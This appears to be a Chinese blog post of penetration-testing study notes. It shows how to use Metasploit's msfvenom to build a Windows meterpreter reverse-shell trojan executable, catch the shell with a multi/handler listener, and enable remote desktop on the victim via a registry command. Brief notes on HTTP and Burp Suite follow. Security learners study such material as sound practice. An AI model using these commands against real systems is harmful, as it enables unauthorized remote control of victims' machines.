• 2019-9-20:渗透测试,基础学习,笔记,metasploit的基础使用


    使用kali下metasploit生成木马,控制windows系统

    kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack)

    Metasploit,是综合利用工具,使用Ruby开发,使用方便

    msfconsole进入工具

    MSF,依赖postgresql数据库,在使用MSF前要开启数据库

    msfvenom:生成木马
    msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5555 -f exe > /root/desktop/muma.exe
    -p,后边跟着payload,攻击成功之后要做什么事情
    lhost,后跟监听的ip
    lport,后跟监听端口
    -f,表示要生产后门文件的类型
    >,重定向到一个路径

    将生成文件发送到靶子机

    开启msfconsole,开启前打开数据库postgresql

    exploits,开发利用,攻击某些服务,平台,系统等用到的工具,
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        show options,查看需要设置哪些参数
        set lhost 192.168.20.135
        run / exploit,启动监听

    在靶子机上点击exe程序,在kaLi中就可以得到靶子的shell
        shell,获取靶机的shell
        ipconfig
        rdesktop 靶机ip,可以登录远程桌面

        REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f,开启3389远程

    payloads,载荷载体,攻击成功之后要操作什么


    HTTP协议
    特点,简单快速,请求方式,get post head 等8种,无连接无状态
    支持模式,B/S:B指的浏览器,S指的servce, C/S:websocket

    URL,统一资源定位符,在网络中用来标识某处的资源
    https:(协议)//www.baidu.com(域名):8080(端口)/s(虚拟目录)/index.php(文件名)?wd=burphelper(参数)#name(锚点部分)

    request,请求包:请求行+请求头+空行+请求数据

    http 1.0 请求方式 get ,post ,head
    http 1.1 请求方式 get, post, head ,options, put ,delete ,trace ,connect

    BP拦截HTTP请求包

  • 相关阅读:
    npx小工具
    2015 Multi-University Training Contest 1
    字符串 --- KMP Eentend-Kmp 自动机 trie图 trie树 后缀树 后缀数组
    AC自动机
    AC自动机
    区间合并 --- Codeforces 558D : Gess Your Way Out ! II
    暴力 + 贪心 --- Codeforces 558C : Amr and Chemistry
    计数排序 + 线段树优化 --- Codeforces 558E : A Simple Task
    Ubuntu 16.04 安装mysql并设置远程访问
    数学 --- 高斯消元 POJ 1830
  • 原文地址:https://www.cnblogs.com/sym945/p/11559868.html
Copyright © 2020-2023  润新知